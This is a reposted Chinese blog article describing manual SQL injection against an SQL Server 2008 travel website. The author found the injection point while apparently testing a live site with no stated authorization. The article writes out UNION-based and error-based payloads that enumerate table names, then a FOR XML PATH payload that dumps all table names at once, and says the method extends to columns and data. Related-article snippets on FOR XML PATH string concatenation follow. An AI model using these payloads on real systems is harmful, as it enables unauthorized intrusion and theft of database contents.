SQL2005/2008手工注入之批量爆数据for xml path

最新推荐文章于 2023-11-07 10:54:39 发布
转载 最新推荐文章于 2023-11-07 10:54:39 发布 · 1.3k 阅读 · 1

本文介绍了一种利用SQL注入技术快速获取数据库表名的方法,通过使用FOR XML PATH语句,能够一次性获取所有表名,大大提高了效率。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >


  作者:佚名 时间:2012-04-15 19:55:11

 最近测试了一个asp.net+sql2008旅游网站,找到一个搜索型注入点。输入单引号报错:


接下来一个一个地列出数据库里有哪些表,先取第一个表名:

and 1=2 union select 1,(select top 1 table_name frominformation_schema.tables),1,1,1,1,1,1,1,1,1,1,'true','true',1,1,1;--

 

 我喜欢用union当然也可以用SQL报错的方式:
and 1=(select top 1 table_name from information_schema.tables);--
这两种方式各有各的优缺点,这里不再多说。
接下来取第二个表名:
and 1=2 union select 1,(select top 1 table_name frominformation_schema.tables where table_name not in('VCW_DailyReport_All ')),1,1,1,1,1,1,1,1,1,1,'true','true',1,1,1;--
接着第三个,以此类推。。。
然而在我照这样的方式获得了60多个表的时候,我再也受不了了。我也不知道数据库里到底有多少个表,我考虑是不是应该找一个快捷的办法。这时我想到了for xml path 以前程序开发的时候碰到过这个SQL语句。
 
我尝试了一下:
 
and 1=2 union select 1,(select table_name+',' from information_schema.tablesfor xml path('')),1,1,1,1,1,1,1,1,1,1,'true','true',1,1,1;--
 
执行结果:

 
这样似乎看起来不方便,看HTML代码:


 
截图没显示全,我估计得有上千个表。要是一个一个的列,不知得何月。
 
这里再次说明一下,for xml path 是一种数据生成方式,不但可以用在爆表,爆字段和爆数据都可以,在手工注入的时候可以明显加快速度。
 
比较低级的发现,请大家多多包涵!
十步优化SQL Server中的数据访问
霍力强的专栏
04-09 2439
故事开篇:你和你的团队经过不懈努力,终于使网站成功上线,刚开始时,注册用户较少,网站性能表现不错,但随着注册用户的增多,访问速度开始变慢,一些用户开始发来邮件表示抗议,事情变得越来越糟,为了留住用户,你开始着手调查访问变慢的原因。  经过紧张的调查,你发现问题出在数据库上,当应用程序尝试访问/更新数据时,数据库执行得相当慢,再次深入调查数据库后,你发现数据库表增长得很大,有些表甚至有上千万行数据,测试团队开始在生产数据库上测试,发现订单提交过程需要花5分钟时间,但在网站上线前的测试中,提交一次订单只需要2/
灵活运用 SQL SERVER FOR XML PATH
weixin_34379433的博客
07-06 2237
FOR XML PATH 有的人可能知道有的人可能不知道,其实它就是将查询结果集以XML形式展现,有了它我们可以简化我们的查询语句实现一些以前可能需要借助函数活存储过程来完成的工作。那么以一个实例为主. 一.FOR XML PATH 简单介绍 那么还是首先来介绍一下FOR XML PATH ,假设现在有一张兴趣爱好表(hobby)用来存...
access数据数据转换为xml文件
04-25
将access数据数据转换为xml文件
11-Web安全—基于SQL Server的联合注入——for xml path
网络安全
07-11 871
1. SQL Server注入 前面已经学过MYSQL注入了,对于大多数数据库来说,SQL注入原理是相似的,不同的是每个数据库所遵循的SQL语句标准存在着细微差异,包括SQL语句,函数等,针对不同数据库可能在注入思路和方法上也有所不同,本篇将学习SQL Server数据库的注入的思路和方法。 SQL Server的系统库及视图: mater :记录所有系统信息,例如所有数据库,登陆,配置设置等信息,master..sysdatabases表中存储着当前数据库的所有库名 model :模板数据.
sql server 2008 使用 for xml path 实现类似 oracle 的 concat 函数
Yewberry 的点滴积累
05-13 5401
1. 列出所有数据 select * from test 2. 合并,带有多余的逗号 SELECT name, (SELECT value+',' FROM test   WHERE name=A.name   FOR XML PATH('')) AS StuList FROM test A GROUP BY name 3. 最终效果 SELECT B
SQL Server 2008中文版标准教程读书笔记 FOR XML(复习SQL Server 八)
不犯錯自然好,但犯錯或許就是為了能多學一些!
10-21 560
除了string类型外,没有其他数据类型
SQL SERVER转置功能数据迁移秘籍:不同数据库间的数据流转
![SQL SERVER转置功能数据迁移秘籍:不同数据库间的数据流转](https://www.altexsoft.com/static/blog-post/2023/11/8d98043e-0880-4257-8d44-b431cb7d2c3e.webp...在数据迁移的实践中,本文详细介绍了从SQL SERVER向其
SQL Server与Excel数据交换】:导出导入的高效捷径
本论文详细探讨了SQL Server与Excel之间数据交换的完整过程,涵盖从SQL Server导出数据到Excel以及将Excel数据导入SQL Server的方法。论文深入讲解了使用T-SQL、SSMS、Query Analyzer、SSIS等工具实现数据导出的多种...
SQL Server 2008编程必备:INSERT语句行值限制的终极处理方案
[SQL Server 2008](https://media.licdn.com/dms/image/C4D12AQFhwOmcAZrRfg/article-cover_image-shrink_600_2000/0/1589986074961?e=2147483647&v=beta&t=i5n-brnrO6NxO0Tvqo5nr71vrzVFm-ROHDL7Cs6lweE) ...
SQL Server 2014文件表使用指南:大数据处理能力提升之道
本文深入探讨了SQL Server 2014中文件表的基础知识、架构与存储机制,以及在大数据处理和数据仓库中的应用实践。通过对文件表的概念、特点、内部结构、存储优化以及高级管理与性能调优的分析,本文旨在帮助数据库...
ACCESS 分组合并
10-25
由于ACCESS 没有oracle的listagg函数,也没有sql server这种 for xml path 这种, 要实现分组合并需要自定义一个函数,理解了 for xml path 这个就很好理解了。
FOR XML PATH 合并列
jcx5083761的专栏
05-10 1961
FOR XML PATH 有的人可能知道有的人可能不知道,其实它就是将查询结果集以XML形式展现,有了它我们可以简化我们的查询语句实现一些以前可能需要借助函数活存储过程来完成的工作。那么以一个实例为主.         一.FOR XML PATH 简单介绍              那么还是首先来介绍一下FOR XML PATH ,假设现在有一张兴趣爱好表(hobby)用来存放兴趣爱
使用 SQLfor xml path来进行字符串拼接
weixin_30387339的博客
01-18 395
  本篇主要讲怎么利用SQLFOR XML PATH 参数来进行字符串拼接,FOR XML PATH的用法很简单,它会以xml文件的形式来返回数据。   我的讲解步骤: 1:构造初始数据 2:提出问题 3:简单介绍FOR XML PATH 4:解答问题 1.构造初始数据 举出一个经典...
SQL 中的For Xml Path详解
最新发布
weixin_40029679的博客
11-07 1856
如果要删除的长度大于第一个字符串的长度,将删除到第一个字符串中的第一个字符。今天就给大家介绍一下FOR XML PATH,它就是用来处理低版本数据库中数据合并的,是一个比较古老的功能了,新版本中也依然还能使用,对SQL 中的For Xml Path相关知识感兴趣的朋友一起看看吧。最近出的每日一题里面,有一道是关于合并同类型数据为一行的题,使用SQL Server 2017版本及以上的直接使用STRING_AGG()函数即可,但是2016版本以下是没有这个功能的,那该如何求解?是不是比LEFT简短一些啦?
SQL Server : FOR XML PATH 函数用法以及转义字符正常显示
枫的专栏
04-14 1万+
For XML,就是将查询结果作为XML来检索。XML有4中模式,官方文档上有这4种模式的使用方法。模式描述RAWSELECT 语句返回的行集中为每个行生成一 元素AUTO将基于指定 SELECT 语句的方式来使用试探性方法在 XML 结果中生成嵌套。(说的是什么?是能够生成嵌套的XML吗?EXPICIT模式允许对 XML 的形状进行更多控制。PATH任务比较简单的方式。仅当执行设置了这些模式的查询时,这些模式才有效。它们不会影响以后执行的任何查询的结果。
SqlServer的for xml path函数
wxzhou的博客
04-11 2万+
这两天在处理一个字符串拼接遇到一个问题: 老师姓名 学科 张老师 语文 张老师 数学 张老师 英语 李老师 体育 李老师 音乐 需要将上面的记录转换成:
SQL SERVER数据库内 FOR XML PATH 函数用法
04-11 376
把自己点点滴滴的学习记录下来!!!! 一.FOR XML PATH 简单介绍 那么还是首先来介绍一下FOR XML PATH ,假设现在有一张兴趣爱好表(TBJTXXCE)用来存放就诊患者信息,表结构如下: 接下来我们来看应用FOR XML PATH的查询结果语句如下: SELECT * FROM TBJTXXCE FOR XML PATH 由此可见FOR XML PATH 可以将查询...
Sql Server 的FOR XML PATH(‘‘)函数用法
热门推荐
chpllp的博客
07-17 2万+
转自:https://www.cnblogs.com/TulipsWill/p/11498859.html 1. 如下表: 2. 转换xml 1 select name from zz FOR XML PATH('root'); 1 ps: FOR XML PATH('root')中root是xml根节点。<br><br><br><br> 3. 加个分隔符和去掉.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值